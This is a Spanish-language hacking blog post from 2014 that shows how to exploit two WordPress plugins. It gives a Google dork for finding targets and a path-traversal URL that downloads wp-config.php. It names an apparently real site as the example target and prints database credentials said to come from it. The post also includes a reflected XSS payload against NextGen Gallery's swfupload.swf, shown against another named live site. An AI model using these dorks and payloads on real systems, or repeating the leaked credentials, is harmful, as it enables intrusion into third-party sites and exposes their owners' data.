HACKER ANGELWHITE GALC

sábado, 23 de agosto de 2014

Explotando Vulnerabilidades de Wordpress

 



Saludos nuevamente mis queridos y fieles lectores de este humilde blog, en esta oportunidad  tocaremos el tema sobre la explotación de un "cms" como Wordpress, mediante los exploit's de url en los sectores vulnerables o débiles de privilegios
Exploit 
Local File Download Wordpresss
La vulnerabilidad archivo de descarga de servidor local, nos permite descargas contenido de información de base de datos las cuales el atacante puede aprovechar para la penetración el servidor web de una manera fácil y rápida  
Dork 
inurl:/wp-content/plugins/wp-filemanager/ site:.com
Exploit : 
/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
Ejemplo de ataque :
Link de la web la cual ingresaste el dork " http://www.wildrift.com/wp-content/plugins/wp-filemanager/" , luego de ello introducirás lo siguiente " /incl/libfile.php?&path=../../&filename=wp-config.php&action=download "
Como vemos en la imagen, podemos ver que al introducir el exploit , automáticamente nos descarga el archivo config.php, bien lo guardaremos 
Archivo "config.php" 
INFORMACIÓN DE  BD
('DB_USER', 'wildri8u_advent');
/** MySQL database password */
define('DB_PASSWORD', 'xa.+(&]AUyrR');
/** MySQL hostname */
define('DB_HOST', 'localhost');
Exploit 

 Cross Site Scripting 

Como todos sabemos lo que es un error " Cross Site Scripting  " , no es necesario que lo diga en este párrafo, pero dejare la referencia de ello en este link :
http://backtrack-omar.blogspot.com/2013/02/cross-site-scripting-xss.html 
Bueno prosigamos, en el modulo de plugins "Plugin NextGen," , se ah descubierto que este complemento tiene un  grave error de "XSS", la cual puede ser aprovechado para varios tipos de ataques dirigidos de cualquier persona que tenga conocimientos de cada uno de ellos.
Dork : 
inurl:/wp-content/plugins/wp-filemanager/ site:.com
Exploit : 
/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert('X4r0r-MostSecurity');//
Ejemplo :
drfranklipman.com/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert('backtrack-omar.blogspot.com');// 

Saludos!!

No hay comentarios:

Publicar un comentario